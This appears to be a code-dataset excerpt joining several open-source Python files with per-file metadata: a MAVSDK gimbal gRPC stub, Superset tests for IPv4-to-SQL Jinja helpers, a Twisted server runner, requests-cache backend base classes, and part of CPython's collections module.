context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetRoiLocation(self, request, context):
"""
Set gimbal region of interest (ROI).
This sets a region of interest that the gimbal will point to.
The gimbal will continue to point to the specified region until it
receives a new command.
The function will return when the command is accepted, however, it might
take the gimbal longer to actually rotate to the ROI.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_GimbalServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'SetPitchAndYaw': grpc.unary_unary_rpc_method_handler(
servicer.SetPitchAndYaw,
request_deserializer=gimbal_dot_gimbal__pb2.SetPitchAndYawRequest.FromString,
response_serializer=gimbal_dot_gimbal__pb2.SetPitchAndYawResponse.SerializeToString,
),
'SetMode': grpc.unary_unary_rpc_method_handler(
servicer.SetMode,
request_deserializer=gimbal_dot_gimbal__pb2.SetModeRequest.FromString,
response_serializer=gimbal_dot_gimbal__pb2.SetModeResponse.SerializeToString,
),
'SetRoiLocation': grpc.unary_unary_rpc_method_handler(
servicer.SetRoiLocation,
request_deserializer=gimbal_dot_gimbal__pb2.SetRoiLocationRequest.FromString,
response_serializer=gimbal_dot_gimbal__pb2.SetRoiLocationResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'mavsdk.rpc.gimbal.GimbalService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class GimbalService(object):
"""Provide control over a gimbal.
"""
@staticmethod
def SetPitchAndYaw(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/mavsdk.rpc.gimbal.GimbalService/SetPitchAndYaw',
gimbal_dot_gimbal__pb2.SetPitchAndYawRequest.SerializeToString,
gimbal_dot_gimbal__pb2.SetPitchAndYawResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetMode(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/mavsdk.rpc.gimbal.GimbalService/SetMode',
gimbal_dot_gimbal__pb2.SetModeRequest.SerializeToString,
gimbal_dot_gimbal__pb2.SetModeResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetRoiLocation(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/mavsdk.rpc.gimbal.GimbalService/SetRoiLocation',
gimbal_dot_gimbal__pb2.SetRoiLocationRequest.SerializeToString,
gimbal_dot_gimbal__pb2.SetRoiLocationResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
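# Usage sketch (not part of the generated module): a minimal synchronous client call,
# assuming a MAVSDK gRPC server is reachable on localhost:50051. Request fields are left
# at their defaults because the gimbal_pb2 message definitions are not shown here.
def _example_set_mode():
    channel = grpc.insecure_channel('localhost:50051')
    stub = GimbalServiceStub(channel)
    return stub.SetMode(gimbal_dot_gimbal__pb2.SetModeRequest())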
| 41.133758
| 112
| 0.665841
|
376f436412356e63b906a1f862b5f88c30d8c840
| 6,394
|
py
|
Python
|
tests/jinja_context_addons_tests.py
|
CybercentreCanada/superset
|
1d812a860b0741c1a408eac299e10183f11a03c8
|
[
"Apache-2.0"
] | 2
|
2021-03-17T18:41:18.000Z
|
2021-05-27T16:45:12.000Z
|
tests/jinja_context_addons_tests.py
|
CybercentreCanada/superset
|
1d812a860b0741c1a408eac299e10183f11a03c8
|
[
"Apache-2.0"
] | 17
|
2021-03-18T21:17:31.000Z
|
2021-12-06T13:54:03.000Z
|
tests/jinja_context_addons_tests.py
|
CybercentreCanada/superset
|
1d812a860b0741c1a408eac299e10183f11a03c8
|
[
"Apache-2.0"
] | 1
|
2022-01-10T13:31:22.000Z
|
2022-01-10T13:31:22.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from ipaddress import NetmaskValueError, AddressValueError
from jinja_context_addons import *
# Imports the Jinja context addons via the PYTHONPATH env variable; make sure the env var points to the directory containing them
from tests.base_tests import SupersetTestCase
class Jinja2ContextAddonsTest(SupersetTestCase):
maxDiff = None
# Test for Correctness
def test_ipv4str_to_number_template(self) -> None:
rendered = ipv4str_to_number('192.168.0.0')
self.assertEqual(3232235520, rendered)
def test_render_ipv4_column_template(self) -> None:
test_filter = [
{
"col": "src_ip_num",
"op": "==",
"val": "1.1.1.1"
},
{
"col": "src_ip_num",
"op": "IN",
"val": ['3.3.3.3', '2.2.2.2']
}
]
rendered = render_ipv4_number_column(test_filter, "src_num_ip")
self.assertEqual(" AND (src_num_ip = 16843009) AND ((src_num_ip = 50529027) OR (src_num_ip = 33686018))", rendered)
def test_render_ipv4_either_number_columns_template(self) -> None:
test_filter = [
{
"col": "src_ip_num",
"op": "==",
"val": ['3.0.0.0/8', '2.2.2.2']
}
]
rendered = render_ipv4_either_number_columns(test_filter, "src_num_ip", "dst_num_ip")
self.assertEqual(" AND ((src_num_ip >= 50331648 AND src_num_ip <= 67108863) OR (src_num_ip = 33686018) OR (dst_num_ip >= 50331648 AND dst_num_ip <= 67108863) OR (dst_num_ip = 33686018))", rendered)
def test_render_ipv4_between_number_colums_template(self) -> None:
test_filter = [
{
"col": "src_ip_num",
"op": "LIKE",
"val": ['12.0.0.0/8', '2.0.0.0/16']
}
]
rendered = render_ipv4_between_number_colums(test_filter, '1.1.1.1', '2.2.2.2' )
self.assertEqual(
''' AND (( (1.1.1.1 <= 201326592 AND 2.2.2.2 >= 201326592)
OR (1.1.1.1 <= 218103807 AND 2.2.2.2 >= 218103807)
OR (201326592 <= 1.1.1.1 AND 2.2.2.2 <= 218103807) ) OR ( (1.1.1.1 <= 33554432 AND 2.2.2.2 >= 33554432)
OR (1.1.1.1 <= 33619967 AND 2.2.2.2 >= 33619967)
OR (33554432 <= 1.1.1.1 AND 2.2.2.2 <= 33619967) ))'''
, rendered)
def test_render_in_conditions_template(self) -> None:
test_ip_array=['1.1.1.1','240.0.0.0/4']
rendered = render_in_conditions(test_ip_array, "src_num_ip")
self.assertEqual(['(src_num_ip = 16843009)', '(src_num_ip >= 4026531840 AND src_num_ip <= 4294967295)'], rendered)
def test_dashboard_link_template(self) -> None:
# TODO Update this test once the dashboard function is fully implemented and complete
test_link_label = "LABEL"
test_dashboard_id = 2301
test_src_column = 'test_col'
test_target_column = 'target_col'
rendered = dashboard_link(test_link_label, test_dashboard_id, test_src_column, test_target_column)
self.assertEqual(" concat('<a href=\"http://10.162.232.22:8088/superset/dashboard/2301/?preselect_filters={%22160%22:{%22target_col%22:[%22', target_col, '%22]}}\">LABEL</a>' ) ", rendered)
# Test for Exceptions
def test_ipv4str_to_number_template_invalid_ip(self) -> None:
# Invalid IP: 1912.168.0.0
self.assertRaises(OSError, ipv4str_to_number, '1912.168.0.0')
def test_render_ipv4_column_template_exception(self) -> None:
# The ValueError in this test case comes from the '3.3.3.3/8' CIDR,
# because the correct way to describe that range of IPs is to start from 3.0.0.0/8
test_filter = [
{
"col": "src_ip_num",
"op": "==",
"val": "1.1.1.1"
},
{
"col": "src_ip_num",
"op": "IN",
"val": ['3.3.3.3/8']
}
]
self.assertRaises(ValueError, render_ipv4_number_column, test_filter, 'src_ip_num' )
def test_render_ipv4_either_number_columns_template_invalid_cidr(self) -> None:
# The invalid CIDR comes from 2.2.2.200/34 (a /34 prefix is out of range for IPv4)
test_filter = [
{
"col": "src_ip_num",
"op": "==",
"val": ['3.0.0.0/8', '2.2.2.200/34']
}
]
self.assertRaises(NetmaskValueError, render_ipv4_either_number_columns, test_filter, "src_num_ip", "dst_num_ip")
def test_render_ipv4_between_number_colums_template_invalid_arguments(self) -> None:
test_filter = [
{
"col": "src_ip_num",
"op": "2",
"val": ['255.255.255.255/0', '80.0.0.0/16']
}
]
self.assertRaises(ValueError, render_ipv4_between_number_colums, test_filter, '1.1.1.1', '2.2.2.2')
def test_render_in_conditions_template_invalid_cidr(self) -> None:
test_ip_array=['1.10.0.1.1','240.0.0.0/4.0']
self.assertRaises(AddressValueError, render_in_conditions, test_ip_array, "src_num_ip")
def test_dashboard_link_template_invalid_label_type(self) -> None:
# TODO Update this test once the dashboard function is fully implemented
test_link_label = 123
test_dashboard_id = -100
test_src_column = 'test_col'
test_target_column = 'target_col'
self.assertRaises(TypeError, dashboard_link, test_link_label, test_dashboard_id, test_src_column, test_target_column)
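# Usage sketch (path is illustrative): run with the addons module on PYTHONPATH, e.g.
#   PYTHONPATH=/path/to/jinja_context_addons pytest tests/jinja_context_addons_tests.py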
| 43.202703
| 205
| 0.613075
|
ee9df0c05c3d8290b5d9d17b3791ec79657b6605
| 1,429
|
py
|
Python
|
fbad/runner.py
|
bennr01/fbad
|
a872aa6e077931743a8cbce3328ce4cbc509745c
|
[
"MIT"
] | 1
|
2018-05-01T13:58:48.000Z
|
2018-05-01T13:58:48.000Z
|
fbad/runner.py
|
bennr01/fbad
|
a872aa6e077931743a8cbce3328ce4cbc509745c
|
[
"MIT"
] | null | null | null |
fbad/runner.py
|
bennr01/fbad
|
a872aa6e077931743a8cbce3328ce4cbc509745c
|
[
"MIT"
] | null | null | null |
"""runner functions for entry points"""
import argparse
import sys
from twisted.internet import reactor
from twisted.python import log
from twisted.internet.endpoints import TCP4ServerEndpoint
from fbad import constants
from fbad.server import FBADServerFactory
def server_main():
"""entry point for the server"""
parser = argparse.ArgumentParser(description="The FBAD Server")
parser.add_argument("-i", "--interface", action="store", help="interface to listen on", default="0.0.0.0")
parser.add_argument("-p", "--port", action="store", type=int, default=constants.DEFAULT_PORT, help="port to listen on")
parser.add_argument("-P", "--password", action="store", default=None, help="protect this server using this password")
parser.add_argument("-v", "--verbose", action="store_true", help="be more verbose")
parser.add_argument("-V", "--version", action="store_true", help="print version and exit")
ns = parser.parse_args()
if ns.version:
import pkg_resources
version = pkg_resources.get_distribution("fbad").version
print("FBAD package version: " + version)
print("FBAD protocol version: " + constants.COM_VERSION)
sys.exit(0)
if ns.verbose:
log.startLogging(sys.stdout)
factory = FBADServerFactory(ns.password)
ep = TCP4ServerEndpoint(reactor, port=ns.port, interface=ns.interface)
ep.listen(factory)
reactor.run()
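# Usage sketch (the installed console-script name depends on the package's entry
# points; the flags are the ones defined above):
#   <entry-point> -i 0.0.0.0 -p <port> -P <password> -v
#   <entry-point> -V    # print package and protocol versions, then exit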
| 37.605263
| 123
| 0.706088
|
942d14f2d1381fa2aef13df0c78dd672db0aeb12
| 10,502
|
py
|
Python
|
requests_cache/backends/base.py
|
harvey251/requests-cache
|
559f9607ed7be26ece0acf00df7b8f09120bf973
|
[
"BSD-2-Clause"
] | null | null | null |
requests_cache/backends/base.py
|
harvey251/requests-cache
|
559f9607ed7be26ece0acf00df7b8f09120bf973
|
[
"BSD-2-Clause"
] | null | null | null |
requests_cache/backends/base.py
|
harvey251/requests-cache
|
559f9607ed7be26ece0acf00df7b8f09120bf973
|
[
"BSD-2-Clause"
] | null | null | null |
import pickle
import warnings
from abc import ABC
from collections.abc import MutableMapping
from datetime import datetime
from logging import DEBUG, WARNING, getLogger
from typing import Iterable, Iterator, Tuple, Union
import requests
from requests.models import PreparedRequest
from ..cache_control import ExpirationTime
from ..cache_keys import create_key, remove_ignored_params, url_to_key
from ..models.response import AnyResponse, CachedResponse
from ..serializers import PickleSerializer, SafePickleSerializer
# Specific exceptions that may be raised during deserialization
DESERIALIZE_ERRORS = (AttributeError, TypeError, ValueError, pickle.PickleError)
ResponseOrKey = Union[CachedResponse, str]
logger = getLogger(__name__)
class BaseCache:
"""Base class for cache implementations, which can also be used as in-memory cache.
See :ref:`advanced_usage:custom backends` for details on creating your own implementation.
"""
def __init__(
self,
*args,
include_get_headers: bool = False,
ignored_parameters: Iterable[str] = None,
**kwargs,
):
self.name = None
self.redirects = {}
self.responses = {}
self.include_get_headers = include_get_headers
self.ignored_parameters = ignored_parameters
@property
def urls(self) -> Iterator[str]:
"""Get all URLs currently in the cache (excluding redirects)"""
for response in self.values():
yield response.url
def save_response(self, response: AnyResponse, key: str = None, expires: datetime = None):
"""Save response to cache
Args:
response: response to save
key: cache key for this response; generated from the request if not provided
expires: expiration time for this cache item
"""
key = key or self.create_key(response.request)
cached_response = CachedResponse.from_response(response, expires=expires)
cached_response.request = remove_ignored_params(cached_response.request, self.ignored_parameters)
self.responses[key] = cached_response
def save_redirect(self, request: PreparedRequest, response_key: str):
"""
Map a redirect request to a response. This makes it possible to associate many keys with a
single response.
Args:
request: Request object for redirect URL
response_key: Cache key which can be found in ``responses``
"""
self.redirects[self.create_key(request)] = response_key
def get_response(self, key: str, default=None) -> CachedResponse:
"""Retrieves response for `key` if it's stored in cache, otherwise returns `default`
Args:
key: Key of resource
default: Value to return if `key` is not in cache
"""
try:
if key not in self.responses:
key = self.redirects[key]
response = self.responses[key]
response.reset() # In case response was in memory and content has already been read
return response
except KeyError:
return default
except DESERIALIZE_ERRORS as e:
logger.error(f'Unable to deserialize response with key {key}: {str(e)}')
logger.debug(e, exc_info=True)
return default
def delete(self, key: str):
"""Delete a response or redirect from the cache, as well any associated redirect history"""
# If it's a response key, first delete any associated redirect history
try:
for r in self.responses[key].history:
del self.redirects[create_key(r.request, self.ignored_parameters)]
except (KeyError, *DESERIALIZE_ERRORS):
pass
# Then delete the response itself, or just the redirect if it's a redirect key
for cache in [self.responses, self.redirects]:
try:
del cache[key]
except KeyError:
pass
def delete_url(self, url: str):
"""Delete a cached response + redirects for ``GET <url>``"""
self.delete(url_to_key(url, self.ignored_parameters))
def bulk_delete(self, keys: Iterable[str]):
"""Remove multiple responses and their associated redirects from the cache"""
self.responses.bulk_delete(keys)
# Remove any redirects that no longer point to an existing response
invalid_redirects = [k for k, v in self.redirects.items() if v not in self.responses]
self.redirects.bulk_delete(set(keys + invalid_redirects))
def clear(self):
"""Delete all items from the cache"""
logger.info('Clearing all items from the cache')
self.responses.clear()
self.redirects.clear()
def remove_expired_responses(self, expire_after: ExpirationTime = None):
"""Remove expired and invalid responses from the cache, optionally with revalidation
Args:
expire_after: A new expiration time used to revalidate the cache
"""
logger.info(
'Removing expired responses. '
+ (f'Revalidating with: {expire_after}' if expire_after else '')
)
keys_to_update = {}
keys_to_delete = []
for key, response in self._get_valid_responses(delete_invalid=True):
# If we're revalidating and it's not yet expired, update the cached item's expiration
if expire_after is not None and not response.revalidate(expire_after):
keys_to_update[key] = response
if response.is_expired:
keys_to_delete.append(key)
# Delay updates & deletes until the end, to avoid conflicts with _get_valid_responses()
logger.debug(f'Deleting {len(keys_to_delete)} expired responses')
self.bulk_delete(keys_to_delete)
if expire_after is not None:
logger.debug(f'Updating {len(keys_to_update)} revalidated responses')
for key, response in keys_to_update.items():
self.responses[key] = response
def remove_old_entries(self, *args, **kwargs):
msg = 'BaseCache.remove_old_entries() is deprecated; please use CachedSession.remove_expired_responses()'
warnings.warn(DeprecationWarning(msg))
self.remove_expired_responses(*args, **kwargs)
def create_key(self, request: requests.PreparedRequest, **kwargs) -> str:
"""Create a normalized cache key from a request object"""
return create_key(request, self.ignored_parameters, self.include_get_headers, **kwargs)
def has_key(self, key: str) -> bool:
"""Returns `True` if cache has `key`, `False` otherwise"""
return key in self.responses or key in self.redirects
def has_url(self, url: str) -> bool:
"""Returns `True` if cache has `url`, `False` otherwise. Works only for GET request urls"""
return self.has_key(url_to_key(url, self.ignored_parameters)) # noqa: W601
def keys(self) -> Iterator[str]:
"""Get all cache keys for redirects and (valid) responses combined"""
yield from self.redirects.keys()
for key, _ in self._get_valid_responses():
yield key
def values(self) -> Iterator[CachedResponse]:
"""Get all valid response objects from the cache"""
for _, response in self._get_valid_responses():
yield response
def _get_valid_responses(self, delete_invalid=False) -> Iterator[Tuple[str, CachedResponse]]:
"""Get all responses from the cache, and skip (+ optionally delete) any invalid ones that
can't be deserialized"""
keys_to_delete = []
for key in self.responses.keys():
try:
yield key, self.responses[key]
except DESERIALIZE_ERRORS:
keys_to_delete.append(key)
# Delay deletion until the end, to improve responsiveness when used as a generator
if delete_invalid:
logger.debug(f'Deleting {len(keys_to_delete)} invalid responses')
self.bulk_delete(keys_to_delete)
def __str__(self):
return f'redirects: {len(self.redirects)}\nresponses: {len(self.responses)}'
def __repr__(self):
return f'<{self.__class__.__name__}(name={self.name})>'
class BaseStorage(MutableMapping, ABC):
"""Base class for backend storage implementations
Args:
secret_key: Optional secret key used to sign cache items for added security
salt: Optional salt used to sign cache items
suppress_warnings: Don't show a warning when not using ``secret_key``
serializer: Custom serializer that provides ``loads`` and ``dumps`` methods
"""
def __init__(
self,
secret_key: Union[Iterable, str, bytes] = None,
salt: Union[str, bytes] = b'requests-cache',
suppress_warnings: bool = False,
serializer=None,
**kwargs,
):
self.serializer = serializer or self._get_serializer(secret_key, salt)
logger.debug(f'Initializing {type(self).__name__} with serializer: {self.serializer}')
if not secret_key:
level = DEBUG if suppress_warnings else WARNING
logger.log(level, 'Using a secret key is recommended for this backend')
def serialize(self, item: ResponseOrKey) -> bytes:
"""Serialize a URL or response into bytes"""
return self.serializer.dumps(item)
def deserialize(self, item: Union[ResponseOrKey, bytes]) -> ResponseOrKey:
"""Deserialize a cached URL or response"""
return self.serializer.loads(item)
@staticmethod
def _get_serializer(secret_key, salt):
"""Get the appropriate serializer to use; either ``itsdangerous``, if a secret key is
specified, or plain ``pickle`` otherwise.
"""
# Import in function scope to make itsdangerous an optional dependency
if secret_key:
return SafePickleSerializer(secret_key=secret_key, salt=salt)
else:
return PickleSerializer()
def bulk_delete(self, keys: Iterable[str]):
"""Delete multiple keys from the cache. Does not raise errors for missing keys. This is a
basic version that subclasses should override with a more efficient backend-specific
version, if possible.
"""
for k in keys:
try:
del self[k]
except KeyError:
pass
def __str__(self):
return str(list(self.keys()))
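# A minimal sketch of a custom backend built on BaseStorage (illustrative only;
# real backends are expected to add more, e.g. an efficient bulk_delete override).
# Only the MutableMapping methods required by BaseCache are implemented here.
class DictStorage(BaseStorage):
    """In-memory storage that serializes values with the configured serializer"""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self._store = {}

    def __getitem__(self, key):
        return self.deserialize(self._store[key])

    def __setitem__(self, key, value):
        self._store[key] = self.serialize(value)

    def __delitem__(self, key):
        del self._store[key]

    def __iter__(self):
        return iter(self._store)

    def __len__(self):
        return len(self._store)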
| 40.083969
| 113
| 0.654637
|
2b6abd879fc939deacc88302d883dcfd6d20e699
| 40,821
|
py
|
Python
|
python3-alpha/python3-src/Lib/collections.py
|
stormtheh4ck3r/python-for-android
|
b9ea9161392f60566b81482b1e25cd77004d5c45
|
[
"Apache-2.0"
] | 4
|
2016-05-04T07:05:22.000Z
|
2020-09-24T00:21:05.000Z
|
python3-alpha/python3-src/Lib/collections.py
|
stormtheh4ck3r/python-for-android
|
b9ea9161392f60566b81482b1e25cd77004d5c45
|
[
"Apache-2.0"
] | 11
|
2017-02-27T22:35:32.000Z
|
2021-12-24T08:07:40.000Z
|
python3-alpha/python3-src/Lib/collections.py
|
stormtheh4ck3r/python-for-android
|
b9ea9161392f60566b81482b1e25cd77004d5c45
|
[
"Apache-2.0"
] | 1
|
2020-11-27T10:36:50.000Z
|
2020-11-27T10:36:50.000Z
|
__all__ = ['deque', 'defaultdict', 'namedtuple', 'UserDict', 'UserList',
'UserString', 'Counter', 'OrderedDict']
# For bootstrapping reasons, the collection ABCs are defined in _abcoll.py.
# They should however be considered an integral part of collections.py.
from _abcoll import *
import _abcoll
__all__ += _abcoll.__all__
from _collections import deque, defaultdict
from operator import itemgetter as _itemgetter
from keyword import iskeyword as _iskeyword
import sys as _sys
import heapq as _heapq
from weakref import proxy as _proxy
from itertools import repeat as _repeat, chain as _chain, starmap as _starmap
from reprlib import recursive_repr as _recursive_repr
################################################################################
### OrderedDict
################################################################################
class _Link(object):
__slots__ = 'prev', 'next', 'key', '__weakref__'
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as regular dictionaries.
# The internal self.__map dict maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# The sentinel is in self.__hardroot with a weakref proxy in self.__root.
# The prev/next links are weakref proxies (to prevent circular references).
# Individual links are kept alive by the hard reference in self.__map.
# Those hard references disappear when a key is deleted from an OrderedDict.
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. The signature is the same as
regular dictionaries, but keyword arguments are not recommended because
their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__hardroot = _Link()
self.__root = root = _proxy(self.__hardroot)
root.prev = root.next = root
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value,
dict_setitem=dict.__setitem__, proxy=_proxy, Link=_Link):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link at the end of the linked list,
# and the inherited dictionary is updated with the new key/value pair.
if key not in self:
self.__map[key] = link = Link()
root = self.__root
last = root.prev
link.prev, link.next, link.key = last, root, key
last.next = link
root.prev = proxy(link)
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which gets
# removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link = self.__map.pop(key)
link_prev = link.prev
link_next = link.next
link_prev.next = link_next
link_next.prev = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
# Traverse the linked list in order.
root = self.__root
curr = root.next
while curr is not root:
yield curr.key
curr = curr.next
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
# Traverse the linked list in reverse order.
root = self.__root
curr = root.prev
while curr is not root:
yield curr.key
curr = curr.prev
def clear(self):
'od.clear() -> None. Remove all items from od.'
root = self.__root
root.prev = root.next = root
self.__map.clear()
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root.prev
link_prev = link.prev
link_prev.next = root
root.prev = link_prev
else:
link = root.next
link_next = link.next
root.next = link_next
link_next.prev = root
key = link.key
del self.__map[key]
value = dict.pop(self, key)
return key, value
def move_to_end(self, key, last=True):
'''Move an existing element to the end (or beginning if last==False).
Raises KeyError if the element does not exist.
When last=True, acts like a fast version of self[key]=self.pop(key).
'''
link = self.__map[key]
link_prev = link.prev
link_next = link.next
link_prev.next = link_next
link_next.prev = link_prev
root = self.__root
if last:
last = root.prev
link.prev = last
link.next = root
last.next = root.prev = link
else:
first = root.next
link.prev = root
link.next = first
root.next = first.prev = link
def __sizeof__(self):
sizeof = _sys.getsizeof
n = len(self) + 1 # number of links including root
size = sizeof(self.__dict__) # instance dictionary
size += sizeof(self.__map) * 2 # internal dict and inherited dict
size += sizeof(self.__hardroot) * n # link objects
size += sizeof(self.__root) * n # proxy objects
return size
update = __update = MutableMapping.update
keys = MutableMapping.keys
values = MutableMapping.values
items = MutableMapping.items
__ne__ = MutableMapping.__ne__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding
value. If key is not found, d is returned if given, otherwise KeyError
is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
@_recursive_repr()
def __repr__(self):
'od.__repr__() <==> repr(od)'
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self.items()))
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S.
If not specified, the value defaults to None.
'''
self = cls()
for key in iterable:
self[key] = value
return self
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
all(p==q for p, q in zip(self.items(), other.items()))
return dict.__eq__(self, other)
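# A short usage sketch in the doctest style used elsewhere in this module
# (illustrative, not executed):
#   >>> od = OrderedDict.fromkeys('abc')
#   >>> od.move_to_end('a')               # 'a' now iterates last
#   >>> list(od)
#   ['b', 'c', 'a']
#   >>> od.popitem(last=False)            # FIFO pop from the front
#   ('b', None)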
################################################################################
### namedtuple
################################################################################
_class_template = '''\
from builtins import property as _property, tuple as _tuple
from operator import itemgetter as _itemgetter
from collections import OrderedDict
class {typename}(tuple):
'{typename}({arg_list})'
__slots__ = ()
_fields = {field_names!r}
def __new__(_cls, {arg_list}):
'Create new instance of {typename}({arg_list})'
return _tuple.__new__(_cls, ({arg_list}))
@classmethod
def _make(cls, iterable, new=tuple.__new__, len=len):
'Make a new {typename} object from a sequence or iterable'
result = new(cls, iterable)
if len(result) != {num_fields:d}:
raise TypeError('Expected {num_fields:d} arguments, got %d' % len(result))
return result
def __repr__(self):
'Return a nicely formatted representation string'
return self.__class__.__name__ + '({repr_fmt})' % self
def _asdict(self):
'Return a new OrderedDict which maps field names to their values'
return OrderedDict(zip(self._fields, self))
__dict__ = property(_asdict)
def _replace(_self, **kwds):
'Return a new {typename} object replacing specified fields with new values'
result = _self._make(map(kwds.pop, {field_names!r}, _self))
if kwds:
raise ValueError('Got unexpected field names: %r' % list(kwds))
return result
def __getnewargs__(self):
'Return self as a plain tuple. Used by copy and pickle.'
return tuple(self)
{field_defs}
'''
_repr_template = '{name}=%r'
_field_template = '''\
{name} = _property(_itemgetter({index:d}), doc='Alias for field number {index:d}')
'''
def namedtuple(typename, field_names, verbose=False, rename=False):
"""Returns a new subclass of tuple with named fields.
>>> Point = namedtuple('Point', ['x', 'y'])
>>> Point.__doc__ # docstring for the new class
'Point(x, y)'
>>> p = Point(11, y=22) # instantiate with positional args or keywords
>>> p[0] + p[1] # indexable like a plain tuple
33
>>> x, y = p # unpack like a regular tuple
>>> x, y
(11, 22)
>>> p.x + p.y # fields also accessible by name
33
>>> d = p._asdict() # convert to a dictionary
>>> d['x']
11
>>> Point(**d) # convert from a dictionary
Point(x=11, y=22)
>>> p._replace(x=100) # _replace() is like str.replace() but targets named fields
Point(x=100, y=22)
"""
# Parse and validate the field names. Validation serves two purposes,
# generating informative error messages and preventing template injection attacks.
if isinstance(field_names, str):
field_names = field_names.replace(',', ' ').split() # names separated by whitespace and/or commas
field_names = list(map(str, field_names))
if rename:
seen = set()
for index, name in enumerate(field_names):
if (not all(c.isalnum() or c=='_' for c in name)
or _iskeyword(name)
or not name
or name[0].isdigit()
or name.startswith('_')
or name in seen):
field_names[index] = '_%d' % index
seen.add(name)
for name in [typename] + field_names:
if not all(c.isalnum() or c=='_' for c in name):
raise ValueError('Type names and field names can only contain alphanumeric characters and underscores: %r' % name)
if _iskeyword(name):
raise ValueError('Type names and field names cannot be a keyword: %r' % name)
if name[0].isdigit():
raise ValueError('Type names and field names cannot start with a number: %r' % name)
seen = set()
for name in field_names:
if name.startswith('_') and not rename:
raise ValueError('Field names cannot start with an underscore: %r' % name)
if name in seen:
raise ValueError('Encountered duplicate field name: %r' % name)
seen.add(name)
# Fill-in the class template
class_definition = _class_template.format(
typename = typename,
field_names = tuple(field_names),
num_fields = len(field_names),
arg_list = repr(tuple(field_names)).replace("'", "")[1:-1],
repr_fmt = ', '.join(_repr_template.format(name=name) for name in field_names),
field_defs = '\n'.join(_field_template.format(index=index, name=name)
for index, name in enumerate(field_names))
)
# Execute the template string in a temporary namespace and
# support tracing utilities by setting a value for frame.f_globals['__name__']
namespace = dict(__name__='namedtuple_%s' % typename)
try:
exec(class_definition, namespace)
except SyntaxError as e:
raise SyntaxError(e.msg + ':\n\n' + class_definition)
result = namespace[typename]
if verbose:
print(class_definition)
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in environments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython).
try:
result.__module__ = _sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
return result
########################################################################
### Counter
########################################################################
def _count_elements(mapping, iterable):
'Tally elements from the iterable.'
mapping_get = mapping.get
for elem in iterable:
mapping[elem] = mapping_get(elem, 0) + 1
try: # Load C helper function if available
from _collections import _count_elements
except ImportError:
pass
class Counter(dict):
'''Dict subclass for counting hashable items. Sometimes called a bag
or multiset. Elements are stored as dictionary keys and their counts
